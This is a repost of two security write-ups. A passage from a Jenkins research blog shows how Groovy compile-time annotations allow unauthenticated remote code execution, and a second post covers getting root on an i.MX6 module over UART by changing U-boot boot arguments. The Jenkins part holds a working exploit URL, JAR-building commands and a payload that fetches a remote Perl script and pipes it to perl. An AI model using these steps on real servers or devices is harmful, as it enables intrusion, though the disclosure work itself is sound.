number by compiler template<int n> struct fib { static const int value = fib<n-1>::value + fib<n-2>::value; }; template<> struct fib<0> { static const int value = 0; }; template<> struct fib<1> { static const int value = 1; }; int main() { int a = fib<10>::value; // 55 int b = fib<20>::value; // 6765 int c = fib<40>::value; // 102334155 } From the assembly language of compiled binary, we can make sure the result is calculated at compile-time, not run-time! $ g++ template.cpp -o template $ objdump -M intel -d template ... 00000000000005fa <main>: 5fa: 55 push rbp 5fb: 48 89 e5 mov rbp,rsp 5fe: c7 45 f4 37 00 00 00 mov DWORD PTR [rbp-0xc],0x37 605: c7 45 f8 6d 1a 00 00 mov DWORD PTR [rbp-0x8],0x1a6d 60c: c7 45 fc cb 7e 19 06 mov DWORD PTR [rbp-0x4],0x6197ecb 613: b8 00 00 00 00 mov eax,0x0 618: 5d pop rbp 619: c3 ret 61a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0] ... For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow! First Attempt Back to our exploitation, Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We start reading the Groovy official Meta-Programming manual to find some exploitation ways. In the section 2.1.9, we found the @groovy.transform.ASTTest annotation. Here is its description: @ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformations gives access to the AST before the Bytecode is produced. @ASTTest can be placed on any annotable node and requires two parameters: What! perform assertions on the AST? Isn’t that what we want? Let’s write a simple Proof-of-Concept in local environment first: this.class.classLoader.parseClass(''' @groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec("touch pwned") }) def x '''); $ ls poc.groovy $ groovy poc.groovy $ ls poc.groovy pwned Cool, it works! However, while reproducing this on the remote Jenkins, it shows: unable to resolve class org.jenkinsci.plugins.workflow.libs.Library What the hell!!! What’s wrong with that? With a little bit digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipeline, Jenkins provides the feature that can import customized library into Pipeline! Jenkins will load this library before every executed Pipeline. As a result, the problem become lack of corresponding library in classPath during compile-time. That’s why the error unsable to resolve class occurs! How to fix this problem? It’s simple! Just go to Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! It can fix the problem and then we can execute arbitrary code without any error! But, this is not a good solution because this plugin is installed along with the Pipeline. It’s lame to ask administrator to remove the plugin for code execution! We stop digging this and try to find another way! Second Attempt We continue reading the Groovy Meta-Programming manual and found another interesting annotation - @Grab. There is no detailed information about @Grab on the manual. However, we found another article - Dependency management with Grape on search engine! Oh, from the article we know Grape is a built-in JAR dependency management in Groovy! It can help programmers import the library which are not in classPath. The usage looks like: @Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE') import org.springframework.jdbc.core.JdbcTemplate By using @Grab annotation, it can import the JAR file which is not in classPath during compile-time automatically! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that’s enough. You can follow the PoC proveded by @adamyordan to execute arbitrary commands! However, without a valid credential and execute() method, this is just an AST parser and you even can’t control files on remote server. So, what can we do? By diving into more about @Grab, we found another interesting annotation - @GrabResolver: @GrabResolver(name='restlet', root='http://maven.restlet.org/') @Grab(group='org.restlet', module='org.restlet', version='1.1.6') import org.restlet If you are smart enough, you would like to change the root parameter to a malicious website! Let’s try this in local environment: this.class.classLoader.parseClass(''' @GrabResolver(name='restlet', root='http://orange.tw/') @Grab(group='org.restlet', module='org.restlet', version='1.1.6') import org.restlet ''') 11.22.33.44 - - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6-javadoc.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0" Wow, it works! Now, we believe we can make Jenkins import any malicious library by Grape! However, the next problem is, how to get code execution? The Way to Code Execution In the exploitation, the target is always escalating the read primitive or write primitive to code execution! From the previous section, we can write malicious JAR file into remote Jenkins server by Grape. However, the next problem is how to execute code? By diving into Grape implementation on Groovy, we realized the library fetching is done by the class groovy.grape.GrapeIvy! We started to find is there any way we can leverage, and we noticed an interesting method processOtherServices(…)! void processOtherServices(ClassLoader loader, File f) { try { ZipFile zf = new ZipFile(f) ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods") if (serializedCategoryMethods != null) { processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods)) } ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners") if (pluginRunners != null) { processRunners(zf.getInputStream(pluginRunners), f.getName(), loader) } } catch(ZipException ignore) { // ignore files we can't process, e.g. non-jar/zip artifacts // TODO log a warning } } JAR file is just a subset of ZIP format. In the processOtherServices(…), Grape registers servies if there are some specified entry points. Among them, the Runner interests me. By looking into the implementation of processRunners(…), we found this: void processRunners(InputStream is, String name, ClassLoader loader) { is.text.readLines().each { GroovySystem.RUNNER_REGISTRY[name] = loader.loadClass(it.trim()).newInstance() } } Here we see the newInstance(). Does it mean that we can call Constructor on any class? Yes, so, we can just create a malicious JAR file, and put the class name into the file META-INF/services/org.codehaus.groovy.plugins.Runners and we can invoke the Constructor and execute arbitrary code! Here is the full exploit: public class Orange { public Orange(){ try { String payload = "curl orange.tw/bc.pl | perl -"; String[] cmds = {"/bin/bash", "-c", payload}; java.lang.Runtime.getRuntime().exec(cmds); } catch (Exception e) { } } } $ javac Orange.java $ mkdir -p META-INF/services/ $ echo Orange > META-INF/services/org.codehaus.groovy.plugins.Runners $ find . ./Orange.java ./Orange.class ./META-INF ./META-INF/services ./META-INF/services/org.codehaus.groovy.plugins.Runners $ jar cvf poc-1.jar ./Orange.class /META-INF/ $ cp poc-1.jar ~/www/tw/orange/poc/1/ $ curl -I http://[your_host]/tw/orange/poc/1/poc-1.jar HTTP/1.1 200 OK Date: Sat, 02 Feb 2019 11:10:55 GMT ... PoC: http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a @Grab(group='tw.orange', module='poc', version='1')%0a import Orange; Video: Epilogue With the exploit, we can gain full access on remote Jenkins server! We use Meta-Programming to import malicious JAR file during compile-time, and executing arbitrary code by the Runner service! Although there is a built-in Groovy Sandbox(Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is in compile-time, not in run-time! Because this is an attack vector on Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s thought which there is no execution so there is no problem. It is also an attack vector that requires the knowledge about computer science. Otherwise, you cannot think of the Meta-Programming! That’s what makes this vulnerability interesting. Aside from entry points doCheckScriptCompile(...) and toJson(...) I reported, after the vulnerability has been fixed, Mikhail Egorov also found another entry point quickly to trigger this vulnerability! Apart from that, this vulnerability can also be chained with my previous exploit on Hacking Jenkins Part 1 to bypass the Overall/Read restriction to a well-deserved pre-auth remote code execution. If you fully understand the article, you know how to chain Thank you for reading this article and hope you like it! Here is the end of Hacking Jenkins series, I will publish more interesting researches in the future Sursa: https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
-
UART-to-Root: The (Slightly) Harder Way Posted on 02/14/2019 AuthorMike Quick Note: This post assumes some knowledge of UART and U-boot, and touches slightly on eMMC dumping. Many familiar with hardware hacking know that UART can be a quick and easy way to find yourself with a shell on a target device. Often times, especially in older home routers and the like, you’ll be automatically logged in as root or be able to log in with an easily-guessed or default password. In other circumstances, you may need to edit some boot arguments in the bootloader to trigger a shell (such as adding a 1 for single-user mode or adding init=/bin/sh). With this initial shell, you can dump and crack passwords or modify the firmware to grant access without the modified bootargs (change password). Recently, I came head-to-head with a device that had a slightly more complicated boot process with many environment variables setting other environment variables that eventually called a boot script from an eMMC that did more of the same. Some Background My target device was being driven by a cl-som-imx6; an off-the-shelf, bolt-on System on Module from Compulab. My target version of the cl-som-imx6 utilized a 16 gig eMMC for firmware storage that had two partitions: a FAT boot partition (in addition to U-boot on an EEPROM) and an EXT4 Linux filesystem. cl-som-imx6 with eMMC removed My first goal for this device was to get an active shell on the device while it was fully booted. Since I had multiple copies of my target device, I went for a quick win and removed eMMC then dumped it’s contents with the hope of recovering and cracking password hashes. While I was able to get the hashes from /etc/shadow, I was disappointed to see they were hashed with sha512crypt ($6$) and have yet been unable to crack them. Without valid credentials, my next goal was to modify boot args to bypass authentication and drop me directly into a root shell, with the hope of being able to change the password. The classic init=/bin/sh trick. It’s important to note that when modifying the bootargs with init=/bin/sh, the device will not go through its standard boot process, therefore it will not kick off any scripts or applications that would normally fire on boot. So, while you may have a root shell, you will not be interacting with the device in its normal state. It is also temporary and will not persist after reboot. The Problem This is where it started getting a bit tricker. In my experience, U-boot usually has an environment variable called bootargs that passes necessary information to the kernel. In this case, there were several variables that set bootargs under different circumstances. I attempted to modify every instance where bootargs were getting set (to add init=/bin/sh) to no avail. 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 # binwalk part1.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 28672 0x7000 Linux kernel ARM boot executable zImage (little-endian) 34516 0x86D4 LZO compressed data 34884 0x8844 LZO compressed data 35489 0x8AA1 device tree image (dtb) 1322131 0x142C93 SHA256 hash constants, little endian 3218379 0x311BCB mcrypt 2.5 encrypted data, algorithm: "5o", keysize: 12292 bytes, mode: "A", 3982809 0x3CC5D9 device tree image (dtb) 4273569 0x4135A1 Unix path: /var/run/L 4932888 0x4B4518 xz compressed data 5359334 0x51C6E6 LZ4 compressed data, legacy 5513216 0x542000 uImage header, header size: 64 bytes, header CRC: 0x665C5745, created: 2018-09-26 16:36:26, image size: 2397 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0x9F621F80, OS: Linux, CPU: ARM, image type: Script file, compression type: none, image name: "boot script" 5517312 0x543000 device tree image (dtb) ... During this time, I also discovered that there appeared to be some sort of watch-dog active that would completely reset the device after about 2 minutes of playing around in U-boot’s menu options. As a note: I don’t believe this was an intended “Security” function but rather an unintended effect caused by the rest of the device (attached to the cl-som-imx6) after it failed to fully boot after X time. After an hour or so reading the UART output during boot and attempting to understand the logic flow of the environment variables, I discovered that U-boot was calling a boot script before it touched any of my edited boot args. Luckily for me, this boot script was being called from the eMMC’s boot partition, which I had dumped previously. Binwalk quickly identified the boot script’s location, but failed to extract it. Using the offset of the script as a starting point and the offset of the following signature as the end point, I used dd to extract the script. As luck would have it, the script was actually a script (plaintext) and not a binary. 1 2 3 4 # dd if=partition1.bin of=boot.script skip=5513216 count=4096 bs=1 4096+0 records in 4096+0 records out 4096 bytes (4.1 kB, 4.0 KiB) copied, 0.0173901 s, 236 kB/s The script was exactly 80 lines and contained several if/else statements, but most importantly, it had only one line setting the bootargs. At this point, my theory was that the only environment variables that mattered were being set by this script. I needed to modify this script to add init=/bin/sh. 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 # cat boot.script setenv loadaddr 0x10800000 setenv fdt_high 0xffffffff setenv fdt_addr 0x15000000 setenv bootm_low 0x15000000 setenv kernel_file zImage setenv vmalloc vmalloc=256M setenv cma cma=384M setenv dmfc dmfc=3 setenv console ttymxc3,115200 setenv env_addr 0x10500000 setenv env_file boot.env setenv ext_env ext_env=empty ... setenv setup_args 'setenv bootargs console=${console} root=${rootdev} rootfstype=ext4 rw rootwait ${ext}' ... The next hurdle was that I didn’t have a direct way of modifying the contents of the eMMC without removing it and that’s the easy part. Getting it back on the SOM would have been tougher work than I was willing to tackle at the time. The Solution Without a simple way to modify the boot script, I decided to try to manually copy and paste each line of the script into the U-boot menu shell and, if necessary, remove all other environment variables. I ran into two problems with this approach. First, any line over 34 characters that I tried to paste got truncated to 34. This was likely just caused by the ft232h buffer or something else with the serial connection. Second, and more annoying, was the watch-dog reset. There was simply no way I was going to paste in 80 lines (especially as many would require multiple c/p’s due to the 34 char limit). Even after removing as much as possible My only answer was to automate the process. I had previously been playing around with the idea of bruteforcing simple 4 digit security codes, so I already had the outline of a script ready. I modified the script to read lines from an input file and write them to the serial device, where any line over 32 (to be safe) characters would be chucked up. To ensure data was sent at the correct time, I put made sure the script waited for the shell prompt to return before sending the next line, with an additional .5 second sleep for good measure. Also, since the script would take over my ft232h, I needed to make sure it stopped autoboot at the correct time to enter the U-Boot shell. This approach worked perfectly and I was dropped into a /bin/sh shell as root. I then took control of my ft232h again so I could interact manually. With a quick passwd, I changed the root password and rebooted. As the modified environment variables didn’t persist through reboot, the device booted as normal and presented me with a login prompt. I entered my newly set password and I was in. Serial and script output ending in shell Changing password I’d post a screenshot of the final successful login after full boot, but I’d have to redact too much stuff that it doesn’t make any sense. As a note: So I could keep an eye on everything, I used a second ft232h to watch the target’s TX pin and since it echoed everything back, I could also see my script’s input. Also, the watch-dog was still in effect since the device didn’t boot as it should have, therefore I had to be quick on the passwd. The Script Below is the script exactly as I used it. With a touch of modification to the until1 and until2 vars, it should be useable for other targets. 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 #!/usr/bin/env python # By Mike Kelly # exfil.co # @lixmk import serial import sys import argparse import re from time import sleep # Key words until1 = "Hit any key to stop autoboot:" until2 = "SOM-iMX6 #" # Read from device until prompt identifier # Not using resp in this, but you can def read_until(until): resp = "" while until not in resp: resp += dev.read(1) return resp def serialprint(): # Get to U-Boot Shell read_until(until1) dev.write("\n") # Wait for U-Boot Prompt read_until(until2) sleep(.5) dev.write("\n") with open(infile) as f: lines = f.readlines() for line in lines: # Lines < 32 if len(line) < 32: read_until(until2) sleep(.5) print "Short Line: "+line.rstrip("\n") dev.write(line) # Break up longer lines else: read_until(until2) sleep(.5) for chunk in re.findall('.{1,32}', line): print "Long Line: "+chunk.rstrip("\n") dev.write(chunk) sleep(.5) dev.write("\n") print "" print "Done... Got root?" exit() if __name__ == '__main__': # Argument parsing parser = argparse.ArgumentParser(usage='./setenv.py -d /dev/ttyUSB0 -b 115200 -f infile.txt') parser.add_argument('-d', '--device', required=True, help='Serial Device path ie: /dev/ttyUSB0') parser.add_argument('-b', '--baud', required=True, type=int, help='Serial Baud rate') parser.add_argument('-f', '--infile', type=str, help="Input file") args = parser.parse_args() device = args.device baud = args.baud infile = args.infile # Configuring device dev = serial.Serial(device, baud, timeout=5) # Executing serialprint() Sursa: https://exfil.co/2019/02/14/uart-to-root-the-harder-way/